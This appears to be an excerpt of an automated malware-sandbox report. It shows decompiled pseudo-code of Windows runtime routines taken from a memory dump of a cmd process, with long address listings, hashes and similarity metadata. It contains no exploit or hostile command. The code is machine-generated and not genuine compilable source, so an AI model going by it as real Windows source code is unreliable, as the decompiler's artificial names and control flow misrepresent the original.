																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3cc7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3cc7b84 = _t75;
						_t73 = E03BEEB70(_t134, 0x3cc7b60);
						if( *0x3cc7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E03BEFF60( *0x3cc7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                                          0x03c0fab0
                                                                                                                                          0x03c0fab2
                                                                                                                                          0x03c0fab3
                                                                                                                                          0x03c0fab4
                                                                                                                                          0x03c0fabc
                                                                                                                                          0x03c0fac0
                                                                                                                                          0x03c0fb14
                                                                                                                                          0x03c0fb17
                                                                                                                                          0x03c0fac2
                                                                                                                                          0x03c0fac8
                                                                                                                                          0x03c0facd
                                                                                                                                          0x03c0fad3
                                                                                                                                          0x03c0fad3
                                                                                                                                          0x03c0fadd
                                                                                                                                          0x03c0fb18
                                                                                                                                          0x03c0fb1b
                                                                                                                                          0x03c0fb1d
                                                                                                                                          0x03c0fb1e
                                                                                                                                          0x03c0fb1f
                                                                                                                                          0x03c0fb20
                                                                                                                                          0x03c0fb21
                                                                                                                                          0x03c0fb22
                                                                                                                                          0x03c0fb23
                                                                                                                                          0x03c0fb24
                                                                                                                                          0x03c0fb25
                                                                                                                                          0x03c0fb26
                                                                                                                                          0x03c0fb27
                                                                                                                                          0x03c0fb28
                                                                                                                                          0x03c0fb29
                                                                                                                                          0x03c0fb2a
                                                                                                                                          0x03c0fb2b
                                                                                                                                          0x03c0fb2c
                                                                                                                                          0x03c0fb2d
                                                                                                                                          0x03c0fb2e
                                                                                                                                          0x03c0fb2f
                                                                                                                                          0x03c0fb3a
                                                                                                                                          0x03c0fb3b
                                                                                                                                          0x03c0fb3e
                                                                                                                                          0x03c0fb41
                                                                                                                                          0x03c0fb44
                                                                                                                                          0x03c0fb47
                                                                                                                                          0x03c0fb4a
                                                                                                                                          0x03c0fb4d
                                                                                                                                          0x03c0fb53
                                                                                                                                          0x03c4bdcb
                                                                                                                                          0x03c4bdcb
                                                                                                                                          0x03c0fb59
                                                                                                                                          0x03c0fb5b
                                                                                                                                          0x03c0fb5b
                                                                                                                                          0x03c0fb5e
                                                                                                                                          0x03c4bdd5
                                                                                                                                          0x03c4bdd8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bdda
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bdda
                                                                                                                                          0x03c0fb64
                                                                                                                                          0x03c0fb64
                                                                                                                                          0x03c0fb64
                                                                                                                                          0x03c0fb67
                                                                                                                                          0x03c0fb6e
                                                                                                                                          0x03c0fb70
                                                                                                                                          0x03c0fb72
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fb78
                                                                                                                                          0x03c0fb7a
                                                                                                                                          0x03c0fb7a
                                                                                                                                          0x03c0fb7d
                                                                                                                                          0x03c0fb80
                                                                                                                                          0x03c4bddf
                                                                                                                                          0x03c4bde1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bde3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bde3
                                                                                                                                          0x03c0fb86
                                                                                                                                          0x03c0fb86
                                                                                                                                          0x03c0fb86
                                                                                                                                          0x03c0fb8b
                                                                                                                                          0x03c0fb90
                                                                                                                                          0x03c0fb92
                                                                                                                                          0x03c0fb94
                                                                                                                                          0x03c0fb9a
                                                                                                                                          0x03c0fb9b
                                                                                                                                          0x03c0fba1
                                                                                                                                          0x03c4bde8
                                                                                                                                          0x03c4bdeb
                                                                                                                                          0x03c4bded
                                                                                                                                          0x03c4beb5
                                                                                                                                          0x03c4beb5
                                                                                                                                          0x03c4bebb
                                                                                                                                          0x03c4bebd
                                                                                                                                          0x03c4bec3
                                                                                                                                          0x03c4bed2
                                                                                                                                          0x03c4bedd
                                                                                                                                          0x03c4bedd
                                                                                                                                          0x03c4beed
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bdf3
                                                                                                                                          0x03c4bdfe
                                                                                                                                          0x03c4be06
                                                                                                                                          0x03c4be0b
                                                                                                                                          0x03c4be0d
                                                                                                                                          0x03c4be0f
                                                                                                                                          0x03c4be14
                                                                                                                                          0x03c4be19
                                                                                                                                          0x03c4be20
                                                                                                                                          0x03c4be25
                                                                                                                                          0x03c4be27
                                                                                                                                          0x03c4be35
                                                                                                                                          0x03c4be39
                                                                                                                                          0x03c4be46
                                                                                                                                          0x03c4be4f
                                                                                                                                          0x03c4be54
                                                                                                                                          0x03c4be56
                                                                                                                                          0x03c4bef8
                                                                                                                                          0x03c4bef8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be5c
                                                                                                                                          0x03c4be5c
                                                                                                                                          0x03c4be60
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be66
                                                                                                                                          0x03c4be66
                                                                                                                                          0x03c4be7f
                                                                                                                                          0x03c4be84
                                                                                                                                          0x03c4be87
                                                                                                                                          0x03c4be89
                                                                                                                                          0x03c4be8b
                                                                                                                                          0x03c4be99
                                                                                                                                          0x03c4be9d
                                                                                                                                          0x03c4bea0
                                                                                                                                          0x03c4beac
                                                                                                                                          0x03c4beaf
                                                                                                                                          0x03c4beb1
                                                                                                                                          0x03c4beb3
                                                                                                                                          0x03c4beb3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bea2
                                                                                                                                          0x03c4bea2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bea2
                                                                                                                                          0x03c4be8d
                                                                                                                                          0x03c4be8d
                                                                                                                                          0x03c4be92
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be92
                                                                                                                                          0x03c4be8b
                                                                                                                                          0x03c4be60
                                                                                                                                          0x03c4be3b
                                                                                                                                          0x03c4be3b
                                                                                                                                          0x03c4be3e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be40
                                                                                                                                          0x03c4be40
                                                                                                                                          0x03c4be44
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be44
                                                                                                                                          0x03c4be3e
                                                                                                                                          0x03c4be29
                                                                                                                                          0x03c4be29
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4be29
                                                                                                                                          0x03c4be27
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fba7
                                                                                                                                          0x03c0fba7
                                                                                                                                          0x03c0fbab
                                                                                                                                          0x03c4bf02
                                                                                                                                          0x03c0fbb1
                                                                                                                                          0x03c0fbb1
                                                                                                                                          0x03c0fbb8
                                                                                                                                          0x03c0fbbd
                                                                                                                                          0x03c0fbbd
                                                                                                                                          0x03c0fbbf
                                                                                                                                          0x03c0fbbf
                                                                                                                                          0x03c0fbc5
                                                                                                                                          0x03c0fbcb
                                                                                                                                          0x03c0fbf8
                                                                                                                                          0x03c0fbf8
                                                                                                                                          0x03c0fbfa
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc00
                                                                                                                                          0x03c0fc00
                                                                                                                                          0x03c0fc03
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc09
                                                                                                                                          0x03c0fc09
                                                                                                                                          0x03c0fc0f
                                                                                                                                          0x03c0fc15
                                                                                                                                          0x03c0fc23
                                                                                                                                          0x03c0fc23
                                                                                                                                          0x03c0fc25
                                                                                                                                          0x03c0fc27
                                                                                                                                          0x03c0fc75
                                                                                                                                          0x03c0fc7c
                                                                                                                                          0x03c0fc84
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc29
                                                                                                                                          0x03c0fc29
                                                                                                                                          0x03c0fc2d
                                                                                                                                          0x03c0fc30
                                                                                                                                          0x03c4bf0f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc36
                                                                                                                                          0x03c0fc38
                                                                                                                                          0x03c0fc3b
                                                                                                                                          0x03c0fc41
                                                                                                                                          0x03c4bf17
                                                                                                                                          0x03c4bf19
                                                                                                                                          0x03c4bf48
                                                                                                                                          0x03c4bf4b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bf1b
                                                                                                                                          0x03c4bf22
                                                                                                                                          0x03c4bf24
                                                                                                                                          0x03c4bf26
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bf2c
                                                                                                                                          0x03c4bf37
                                                                                                                                          0x03c4bf39
                                                                                                                                          0x03c4bf3b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bf41
                                                                                                                                          0x03c4bf41
                                                                                                                                          0x03c4bf41
                                                                                                                                          0x03c4bf41
                                                                                                                                          0x03c4bf45
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4bf45
                                                                                                                                          0x03c4bf3b
                                                                                                                                          0x03c4bf26
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc47
                                                                                                                                          0x03c0fc47
                                                                                                                                          0x03c0fc49
                                                                                                                                          0x03c0fcb2
                                                                                                                                          0x03c0fcb4
                                                                                                                                          0x03c0fcb6
                                                                                                                                          0x03c0fcdc
                                                                                                                                          0x03c0fcdc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fcb8
                                                                                                                                          0x03c0fcc3
                                                                                                                                          0x03c0fcc5
                                                                                                                                          0x03c0fcc7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fcc9
                                                                                                                                          0x03c0fcc9
                                                                                                                                          0x03c0fccd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fccd
                                                                                                                                          0x03c0fcc7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc4b
                                                                                                                                          0x03c0fc4b
                                                                                                                                          0x03c0fc4e
                                                                                                                                          0x03c0fc4e
                                                                                                                                          0x03c0fc51
                                                                                                                                          0x03c0fc51
                                                                                                                                          0x03c0fc54
                                                                                                                                          0x03c0fc5a
                                                                                                                                          0x03c0fc5c
                                                                                                                                          0x03c0fc5f
                                                                                                                                          0x03c0fc61
                                                                                                                                          0x03c0fc63
                                                                                                                                          0x03c0fc65
                                                                                                                                          0x03c0fc67
                                                                                                                                          0x03c0fc6e
                                                                                                                                          0x03c0fc72
                                                                                                                                          0x03c0fc72
                                                                                                                                          0x03c0fc72
                                                                                                                                          0x03c0fc72
                                                                                                                                          0x03c0fc67
                                                                                                                                          0x03c0fc61
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc5a
                                                                                                                                          0x03c0fc49
                                                                                                                                          0x03c0fc41
                                                                                                                                          0x03c0fc30
                                                                                                                                          0x03c0fc27
                                                                                                                                          0x03c0fc03
                                                                                                                                          0x03c0fbcd
                                                                                                                                          0x03c0fbd3
                                                                                                                                          0x03c0fbd9
                                                                                                                                          0x03c0fbdc
                                                                                                                                          0x03c0fbde
                                                                                                                                          0x03c0fc99
                                                                                                                                          0x03c0fc9b
                                                                                                                                          0x03c0fc9d
                                                                                                                                          0x03c0fcd5
                                                                                                                                          0x03c0fcd5
                                                                                                                                          0x03c0fc89
                                                                                                                                          0x03c0fc89
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fc9f
                                                                                                                                          0x03c0fc9f
                                                                                                                                          0x03c0fca3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fca3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fbe4
                                                                                                                                          0x03c0fbe4
                                                                                                                                          0x03c0fbe4
                                                                                                                                          0x03c0fbe4
                                                                                                                                          0x03c0fbe9
                                                                                                                                          0x03c0fbf2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fbf2
                                                                                                                                          0x03c0fbde
                                                                                                                                          0x03c0fbcb
                                                                                                                                          0x03c0fbab
                                                                                                                                          0x03c0fc8b
                                                                                                                                          0x03c0fc8b
                                                                                                                                          0x03c0fc8c
                                                                                                                                          0x03c0fb80
                                                                                                                                          0x03c0fb72
                                                                                                                                          0x03c0fb5e
                                                                                                                                          0x03c0fc8d
                                                                                                                                          0x03c0fc91
                                                                                                                                          0x03c0fadf
                                                                                                                                          0x03c0fadf
                                                                                                                                          0x03c0fae1
                                                                                                                                          0x03c0fae4
                                                                                                                                          0x03c0fae7
                                                                                                                                          0x03c0faec
                                                                                                                                          0x03c0faf8
                                                                                                                                          0x03c0fb00
                                                                                                                                          0x03c0fb07
                                                                                                                                          0x03c0fb0f
                                                                                                                                          0x03c0fb0f
                                                                                                                                          0x03c0fb07
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0faf8
                                                                                                                                          0x03c0fadd

                                                                                                                                          Strings
                                                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 03C4BE0F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                          • API String ID: 0-865735534
                                                                                                                                          • Opcode ID: ea77e0c1778140b7f91ed6c8e8ec064ab4a7464604245d19757995180621a3be
                                                                                                                                          • Instruction ID: 65bae36439f6f1c235a60300d6dbce942d863cd4dbff7fd467dab6c51c64767f
                                                                                                                                          • Opcode Fuzzy Hash: ea77e0c1778140b7f91ed6c8e8ec064ab4a7464604245d19757995180621a3be
                                                                                                                                          • Instruction Fuzzy Hash: C2A1E075B007868BDB35DB69C451B7AB3A8AF48714F0845ADE946DF6C0DB30DE81CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                          			E03BD2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3cc5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3cc7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E03C197C0();
				}
				if( *0x3cc79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x3cc79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03C01624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03BF7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E03C6FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03C19520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E03C0E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L03C2DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3cc6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3cc6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03C19980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E03C195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03BF7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03BF7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03C57016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E03C6FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3cc5350;
							if(_t109 != 0x3cc5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E03C6FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03C65720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                                          0x03bd2d8a
                                                                                                                                          0x03bd2d8a
                                                                                                                                          0x03bd2d92
                                                                                                                                          0x03bd2d96
                                                                                                                                          0x03bd2d9e
                                                                                                                                          0x03bd2da0
                                                                                                                                          0x03bd2da3
                                                                                                                                          0x03bd2da5
                                                                                                                                          0x03bd2da8
                                                                                                                                          0x03bd2dab
                                                                                                                                          0x03bd2db2
                                                                                                                                          0x03c2f9aa
                                                                                                                                          0x03c2f9ab
                                                                                                                                          0x03c2f9ae
                                                                                                                                          0x03c2f9ae
                                                                                                                                          0x03bd2db8
                                                                                                                                          0x03bd2dc2
                                                                                                                                          0x03c2f9b9
                                                                                                                                          0x03c2f9be
                                                                                                                                          0x03c2f9bf
                                                                                                                                          0x03c2f9bf
                                                                                                                                          0x03bd2dcf
                                                                                                                                          0x03c2f9c9
                                                                                                                                          0x03bd2dd5
                                                                                                                                          0x03bd2dd5
                                                                                                                                          0x03bd2dd5
                                                                                                                                          0x03bd2dde
                                                                                                                                          0x03bd2de1
                                                                                                                                          0x03bd2e70
                                                                                                                                          0x03bd2e72
                                                                                                                                          0x03bd2e72
                                                                                                                                          0x03bd2de7
                                                                                                                                          0x03bd2deb
                                                                                                                                          0x03bd2e7c
                                                                                                                                          0x03bd2e83
                                                                                                                                          0x03bd2e85
                                                                                                                                          0x03bd2e8b
                                                                                                                                          0x03bd2e8d
                                                                                                                                          0x03bd2e92
                                                                                                                                          0x03bd2e92
                                                                                                                                          0x03bd2e85
                                                                                                                                          0x03bd2df1
                                                                                                                                          0x03bd2df7
                                                                                                                                          0x03bd2df9
                                                                                                                                          0x03bd2df9
                                                                                                                                          0x03bd2dfc
                                                                                                                                          0x03bd2dff
                                                                                                                                          0x03bd2e02
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd2e05
                                                                                                                                          0x03bd2e0c
                                                                                                                                          0x03c2f9d9
                                                                                                                                          0x03bd2e12
                                                                                                                                          0x03bd2e12
                                                                                                                                          0x03bd2e12
                                                                                                                                          0x03bd2e1a
                                                                                                                                          0x03c2f9e3
                                                                                                                                          0x03c2f9e9
                                                                                                                                          0x03c2f9f0
                                                                                                                                          0x03c2f9f6
                                                                                                                                          0x03c2f9f8
                                                                                                                                          0x03c2f9f8
                                                                                                                                          0x03c2f9f0
                                                                                                                                          0x03bd2e23
                                                                                                                                          0x03c2fa02
                                                                                                                                          0x03c2fa03
                                                                                                                                          0x03c2fa05
                                                                                                                                          0x03c2fa06
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd2e29
                                                                                                                                          0x03bd2e29
                                                                                                                                          0x03bd2e2e
                                                                                                                                          0x03bd2e34
                                                                                                                                          0x03bd2e3e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd2e44
                                                                                                                                          0x03bd2e47
                                                                                                                                          0x03bd2e4d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd2e4f
                                                                                                                                          0x03bd2e54
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd2e5a
                                                                                                                                          0x03bd2e5f
                                                                                                                                          0x03bd2e9a
                                                                                                                                          0x03bd2ea4
                                                                                                                                          0x03bd2ea5
                                                                                                                                          0x03bd2ea8
                                                                                                                                          0x03bd2eaf
                                                                                                                                          0x03bd2eb2
                                                                                                                                          0x03bd2eb5
                                                                                                                                          0x03c2fae9
                                                                                                                                          0x03c2faeb
                                                                                                                                          0x03c2faed
                                                                                                                                          0x03c2faef
                                                                                                                                          0x03c2faf7
                                                                                                                                          0x03c2faf8
                                                                                                                                          0x03c2fafd
                                                                                                                                          0x03c2faff
                                                                                                                                          0x03c2fb04
                                                                                                                                          0x03c2fb04
                                                                                                                                          0x03c2faff
                                                                                                                                          0x03bd2ec0
                                                                                                                                          0x03bd2ec4
                                                                                                                                          0x03bd2ec6
                                                                                                                                          0x03bd2ec8
                                                                                                                                          0x03c2fb14
                                                                                                                                          0x03c2fb18
                                                                                                                                          0x03c2fb1e
                                                                                                                                          0x03c2fb21
                                                                                                                                          0x03c2fb21
                                                                                                                                          0x03bd2ece
                                                                                                                                          0x03bd2ece
                                                                                                                                          0x03bd2ece
                                                                                                                                          0x03bd2ed7
                                                                                                                                          0x03bd2e61
                                                                                                                                          0x03bd2e63
                                                                                                                                          0x03c2fa6b
                                                                                                                                          0x03c2fa71
                                                                                                                                          0x03c2fa76
                                                                                                                                          0x03c2fa78
                                                                                                                                          0x03c2fa8a
                                                                                                                                          0x03c2fa7a
                                                                                                                                          0x03c2fa83
                                                                                                                                          0x03c2fa83
                                                                                                                                          0x03c2fa8f
                                                                                                                                          0x03c2fa91
                                                                                                                                          0x03c2fa97
                                                                                                                                          0x03c2fa9d
                                                                                                                                          0x03c2faa4
                                                                                                                                          0x03c2faaa
                                                                                                                                          0x03c2faaf
                                                                                                                                          0x03c2fab1
                                                                                                                                          0x03c2fac3
                                                                                                                                          0x03c2fab3
                                                                                                                                          0x03c2fabc
                                                                                                                                          0x03c2fabc
                                                                                                                                          0x03c2fac8
                                                                                                                                          0x03c2facb
                                                                                                                                          0x03c2fadf
                                                                                                                                          0x03c2fadf
                                                                                                                                          0x03c2facb
                                                                                                                                          0x03c2faa4
                                                                                                                                          0x03c2fa91
                                                                                                                                          0x03bd2e6f
                                                                                                                                          0x03bd2e6f
                                                                                                                                          0x03bd2e5f
                                                                                                                                          0x03c2fa13
                                                                                                                                          0x03c2fa15
                                                                                                                                          0x03c2fa17
                                                                                                                                          0x03c2fa1f
                                                                                                                                          0x03c2fa21
                                                                                                                                          0x03c2fa22
                                                                                                                                          0x03c2fa25
                                                                                                                                          0x03c2fa28
                                                                                                                                          0x03c2fa2f
                                                                                                                                          0x03c2fa2f
                                                                                                                                          0x03c2fa2a
                                                                                                                                          0x03c2fa2a
                                                                                                                                          0x03c2fa2a
                                                                                                                                          0x03c2fa31
                                                                                                                                          0x03c2fa34
                                                                                                                                          0x03c2fa36
                                                                                                                                          0x03c2fa3c
                                                                                                                                          0x03c2fa3e
                                                                                                                                          0x03c2fa41
                                                                                                                                          0x03c2fa43
                                                                                                                                          0x03c2fa45
                                                                                                                                          0x03c2fa45
                                                                                                                                          0x03c2fa41
                                                                                                                                          0x03c2fa3c
                                                                                                                                          0x03c2fa4a
                                                                                                                                          0x03c2fa4f
                                                                                                                                          0x03c2fa51
                                                                                                                                          0x03c2fa53
                                                                                                                                          0x03c2fa56
                                                                                                                                          0x03c2fa5b
                                                                                                                                          0x03c2fa5e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2fa5e
                                                                                                                                          0x03bd2e23

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RTL: Re-Waiting
                                                                                                                                          • API String ID: 0-316354757
                                                                                                                                          • Opcode ID: a15de34009e490239e80a9b39a146d66913b4e6df0b383a291b827823ee33bde
                                                                                                                                          • Instruction ID: 51f9818a6a75311c9ce42423c38813f02b34bfd76ebfc7dd956943898c8b5e22
                                                                                                                                          • Opcode Fuzzy Hash: a15de34009e490239e80a9b39a146d66913b4e6df0b383a291b827823ee33bde
                                                                                                                                          • Instruction Fuzzy Hash: 9D612571A00798DFDB21DB68C890B7EBBB5EB48B18F190AEDD411DF2C0DB749A019791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E03CA0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E03C9FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03CA1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03C19730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E03C9A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E03C9A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3cc8b04 >> 0x14) + (_v44 -  *0x3cc8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03BF7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
